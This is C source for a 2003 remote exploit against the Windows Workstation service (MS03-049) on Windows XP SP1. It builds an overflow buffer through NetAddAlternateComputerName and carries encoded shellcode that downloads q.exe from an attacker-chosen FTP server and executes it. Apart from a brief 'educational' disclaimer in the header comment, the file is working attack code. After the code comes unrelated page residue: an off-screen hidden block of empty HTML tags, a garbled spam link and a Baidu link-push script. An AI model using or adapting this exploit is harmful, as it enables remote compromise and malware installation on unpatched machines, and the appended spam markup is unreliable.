/* MS03-049
 * windows wkssvc remote exploit by qaaz@centrum.cz. Nov 2003
 * private until Dec 2003
 *
 * uses NetAddAlternateComputerName netapi function and thus
 * - it is not limited to FAT32 filesystems
 * - it is limited to XPs
 *
 * uses ninja shellcode decryptor by creed@pi.nxs.se with first
 * four bytes modified by me.
 *
 * internal shellcode is not size optimized, but who cares about
 * it - there is a lot of space on the stack. it downloads q.exe
 * from a specified ftp server and executes it.
 *
 * this is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * have fun
 * (and don't leave q.exe in windows system32 directory ;))
 */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment(lib, "mpr.lib")

//////////////////////////////////////////////////////////////////

char ninja_header[] =
"\x54\x41\x41\x41\x5a\x52\x59\x68\x40\x40\x40\x40\x58\x50\x30\x62"
"\x4d\x30\x62\x4e\x30\x62\x6e\x40\x40\x40\x40\x30\x42\x4a\x40\x30"
"\x42\x50\x30\x42\x51\x58\x35\x40\x40\x40\x40\x48\x30\x62\x50\x30"
"\x62\x51\x30\x62\x75\x68\x40\x40\x40\x40\x58\x35\x40\x40\x40\x40"
"\x30\x42\x76\x32\x42\x76\x30\x62\x76\x42\x78\x58\x74\x68\x6c\x40"
"\x7a\x7a\x44\x32\x41\x76\x30\x41\x76\x68\x40\x40\x40\x40\x58\x35"
"\x40\x40\x40\x40\x30\x42\x76\x32\x42\x76\x30\x42\x76\x42\x6c\x40"
"\x30\x41\x76\x41\x75\x40";

char qaazcode[] =
"\xe9\x3d\x01\x00\x00\x5d\x8b\x5d\x00\x89\xd8\x83\xc0\x3c\x8b\x00"
"\x01\xd8\x05\x80\x00\x00\x00\x8b\x10\x01\xda\x8b\x02\x01\xd8\x89"
"\x45\x04\x83\xc2\x10\x8b\x02\x01\xd8\x89\x45\x08\x31\xc9\x31\xd2"
"\x8b\x45\x04\x01\xc8\x8b\x00\x01\xd8\x83\xc0\x02\x89\xc6\x8b\x45"
"\x08\x01\xc8\x8b\x00\x81\x3e\x4c\x6f\x61\x64\x75\x18\x81\x7e\x04"
"\x4c\x69\x62\x72\x75\x0f\x81\x7e\x08\x61\x72\x79\x41\x75\x06\x89"
"\x45\x1c\x42\xeb\x15\x81\x3e\x47\x65\x74\x50\x75\x0d\x81\x7e\x04"
"\x72\x6f\x63\x41\x75\x04\x89\x45\x20\x42\x83\xc1\x04\x83\xfa\x02"
"\x75\xae\x8b\x75\x1c\x8b\x7d\x20\x89\xe8\x83\xc0\x38\x50\xff\xd6"
"\x89\x45\x0c\x89\xe8\x83\xc0\x7c\x50\xff\x75\x0c\xff\xd7\x89\x45"
"\x30\x89\xe8\x05\x84\x00\x00\x00\x50\xff\x75\x0c\xff\xd7\x89\x45"
"\x34\x89\xe8\x83\xc0\x45\x50\xff\xd6\x89\x45\x10\x89\xe8\x83\xc0"
"\x51\x50\xff\x75\x10\xff\xd7\x89\x45\x24\x89\xe8\x83\xc0\x5f\x50"
"\xff\x75\x10\xff\xd7\x89\x45\x28\x89\xe8\x83\xc0\x70\x50\xff\x75"
"\x10\xff\xd7\x89\x45\x2c\x31\xdb\x53\x53\x53\x68\x01\x00\x00\x00"
"\x53\xff\x55\x24\x89\x45\x14\x53\x53\x68\x01\x00\x00\x00\x53\x53"
"\x68\x15\x00\x00\x00\x89\xe8\x05\x8f\x00\x00\x00\x50\xff\x75\x14"
"\xff\x55\x28\x89\x45\x18\x53\x68\x02\x00\x00\x00\x68\x80\x00\x00"
"\x00\x53\x89\xe8\x05\x9f\x00\x00\x00\x50\x50\xff\x75\x18\xff\x55"
"\x2c\x53\x89\xe8\x05\x9f\x00\x00\x00\x50\xff\x55\x30\x53\xff\x55"
"\x34\xc3\xe8\xbe\xfe\xff\xff\x49\x4d\x47\x42\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4b"
"\x45\x52\x4e\x45\x4c\x33\x32\x2e\x44\x4c\x4c\x00\x57\x49\x4e\x49"
"\x4e\x45\x54\x2e\x44\x4c\x4c\x00\x49\x6e\x74\x65\x72\x6e\x65\x74"
"\x4f\x70\x65\x6e\x41\x00\x49\x6e\x74\x65\x72\x6e\x65\x74\x43\x6f"
"\x6e\x6e\x65\x63\x74\x41\x00\x46\x74\x70\x47\x65\x74\x46\x69\x6c"
"\x65\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54"
"\x68\x72\x65\x61\x64\x00\x46\x54\x50\x2e\x46\x54\x50\x2e\x46\x54"
"\x50\x2e\x46\x54\x50\x00\x71\x2e\x65\x78\x65\x00";

typedef struct tagTARGET {
	char            *title;
	unsigned long   imagebase;
	int             padlen;
	unsigned long   retaddr;
	int             retlen;
	BOOL            ninja;
} TARGET;

TARGET targets[] = {
	{ "Windows XP Pro, SP1", 0x75140000, 2044, 0x77da33a0, 0x10, TRUE }
};

//////////////////////////////////////////////////////////////////

typedef int (WINAPI * ADDALTCN) (char*, char*, void*, void*, long);

HINSTANCE hNetApi;
ADDALTCN fnNetAdd = NULL;

char szNetApi[] = "netapi32.dll";
char szNetAdd[] = "NetAddAlternateComputerName";

//////////////////////////////////////////////////////////////////

void banner()
{
	printf("===============================================\n");
	printf("windows wkssvc remote exploit by qaaz. Nov 2003\n");
	printf("===============================================\n\n");
}

void usage(char* prog)
{
	printf("usage:\n");
	printf("%s <opt>:<optarg>\n", prog);
	printf("\t-h:hostname\n"
		"\t-t:target\n"
		"\t-p:padlen\n"
		"\t-r:retaddr\n"
		"\t-l:retlen\n"
		"\t-c:codefile\n"
		"\t-f:ftpserver\n"
		"\t-i:imagebase\n"
		"\t-attack\n"
		"\t-noninja\n"
		"\n");

	printf("targets:\n");
	for (int i = 0; i < (sizeof(targets) / sizeof(TARGET)); i++)
		printf("\t%d: %s\n", i, targets[i].title);
}

void ninja_encode(char* in, char* out, int len)
{
	char temp[3];

	for (int i = 0; i < len; i++)
	{
		sprintf(temp, "%c%c", ((*in>>4)&0xf)+0x40, (*in&0xf)+0x40);
		strcat(out, temp);
		in++;
	}
	strcat(out, "X");
}

//////////////////////////////////////////////////////////////////

int main(int argc, char* argv[])
{
	int     stat, i;
	char    opt, *optarg, *pchar;

	TARGET  target = targets[0];
	BOOL    attack = FALSE, ninja = TRUE;
	char    *hostname = NULL, *codefile = NULL, *ftpserv = NULL;
	
	char ipc[1024];
	char aname[1 * 1024];
	char wname[2 * 1024];
	char abuff[10 * 1024];
	char wbuff[20 * 1024];

	banner();

	if (argc == 1)
	{
		usage(argv[0]);
		return 1;
	}

	for (i = 1; i < argc; i++)
	{
		if (!strncmp(argv[i], "-h:", 3))        opt = 'h';
		else if (!strncmp(argv[i], "-t:", 3))   opt = 't';
		else if (!strncmp(argv[i], "-p:", 3))   opt = 'p';
		else if (!strncmp(argv[i], "-r:", 3))   opt = 'r';
		else if (!strncmp(argv[i], "-l:", 3))   opt = 'l';
		else if (!strncmp(argv[i], "-c:", 3))   opt = 'c';
		else if (!strncmp(argv[i], "-f:", 3))   opt = 'f';
		else if (!strncmp(argv[i], "-i:", 3))   opt = 'i';
		else if (!strcmp(argv[i], "-attack"))   opt = 'a';
		else if (!strcmp(argv[i], "-noninja"))  opt = 'n';
		else {
			usage(argv[0]);
			return 1;
		}

		if (argv[i][2] == ':')
			optarg = argv[i] + 3;
		else
			optarg = "";

		switch (opt)
		{
		case 'h':
			hostname = optarg;
			break;
		case 't':
			if (atoi(optarg) < 0 || atoi(optarg) > sizeof(targets))
				return 1;
			target = targets[atoi(optarg)];
			break;
		case 'p':
			target.padlen = atoi(optarg);
			break;
		case 'r':
			sscanf(optarg, "%lx", &target.retaddr);
			break;
		case 'l':
			target.retlen = atoi(optarg);
			break;
		case 'c':
			codefile = optarg;
			break;
		case 'f':
			ftpserv = optarg;
			break;
		case 'i':
			sscanf(optarg, "%lx", &target.imagebase);
			break;
		case 'a':
			attack = TRUE;
			break;
		case 'n':
			ninja = FALSE;
			break;
		}
	}

	sprintf(ipc, "\\\\%s\\ipc$", hostname);
	sprintf(aname, "\\\\%s", hostname);
	memset(wname, 0, sizeof(wname));
	memset(abuff, 0, sizeof(abuff));
	memset(wbuff, 0, sizeof(wbuff));

	printf("[+] loading '%s' library...\n", szNetApi);
	hNetApi = LoadLibrary(szNetApi);
	if (hNetApi == NULL)
	{
		printf("[-] '%s' not loaded\n", szNetApi);
		return 1;
	}
	printf("[+] loaded at %p\n", hNetApi);

	printf("[+] locating '%s' function...\n", szNetAdd);
	fnNetAdd = (ADDALTCN) GetProcAddress(hNetApi, szNetAdd);
	if (fnNetAdd == NULL)
	{
		printf("[-] '%s' not found\n", szNetAdd);
		return 1;
	}
	printf("[+] located at %p\n", fnNetAdd);

	printf("[+] connecting to '%s'...\n", hostname);
	NETRESOURCE nr;
	nr.lpLocalName = NULL;
	nr.lpProvider = NULL;
	nr.dwType = RESOURCETYPE_ANY;
	nr.lpRemoteName = ipc;
	stat = WNetAddConnection2(&nr, "", "", 0);
	if (stat != 0)
	{
		printf("[-] WNetAddConnection2 failed\n");
		return 1;
	}
	printf("[+] connected\n");

	if (attack)
	{
		int slen = 0;
		char scode[1 * 1024];

		memset(scode, 0, sizeof(scode));

		if (codefile)
		{
			FILE *fcode;

			printf("[+] loading '%s' shellcode...\n", codefile);
			if (!(fcode = fopen(codefile, "r")))
			{
				printf("[-] fopen failed\n");
				return 1;
			}
			slen = fread(scode, 1, sizeof(scode), fcode);
			fclose(fcode);
			printf("[+] loaded %d B of shellcode\n", slen);
		}
		else
		{
			slen = sizeof(qaazcode);
			memcpy(scode, qaazcode, slen);

			for (i = 0; i < (slen - 15); i++)
			{
				pchar = scode + i;
				if (!strncmp(pchar, "IMGB", 4))
					*(unsigned long *)pchar = target.imagebase;
				if (!strncmp(pchar, "FTP.FTP.FTP.FTP", 15))
					strcpy(pchar, ftpserv);
			}
		}

		memset(abuff, 'A', target.padlen + 4);
		pchar = abuff + target.padlen;
		*(unsigned long *)pchar = target.retaddr;
		pchar += 4;
		memset(pchar, 'A', target.retlen);
		pchar += target.retlen;

		if (ninja)
		{
			char ncode[2 * 1024];

			memset(ncode, 0, sizeof(ncode));
			ninja_encode(scode, ncode, slen);
			memcpy(pchar, ninja_header, strlen(ninja_header));
			pchar += strlen(ninja_header);
			memcpy(pchar, ncode, (slen * 2) + 1);
		}
		else
		{
			memcpy(pchar, scode, slen);
		}
	}
	else
	{
		strcpy(abuff, "[null]");
	}

	printf("[+] converting ansi strings to unicode\n");
	MultiByteToWideChar(CP_ACP, 0, aname, strlen(aname) + 1, (WCHAR *)wname, sizeof(wname) / sizeof(wname[0]));
	MultiByteToWideChar(CP_ACP, 0, abuff, strlen(abuff) + 1, (WCHAR *)wbuff, sizeof(wbuff) / sizeof(wbuff[0]));

	printf("[+] sending query...\n");
	stat = fnNetAdd((char *)wname, (char *)wbuff, NULL, NULL, 0);
	printf("[+] sent (status: %d)\n", stat);

	printf("[+] disconnecting\n");
	WNetCancelConnection2(ipc, 0, TRUE);
	FreeLibrary(hNetApi);

	printf("[.] that's all folks\n");
	return 0;
}
<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>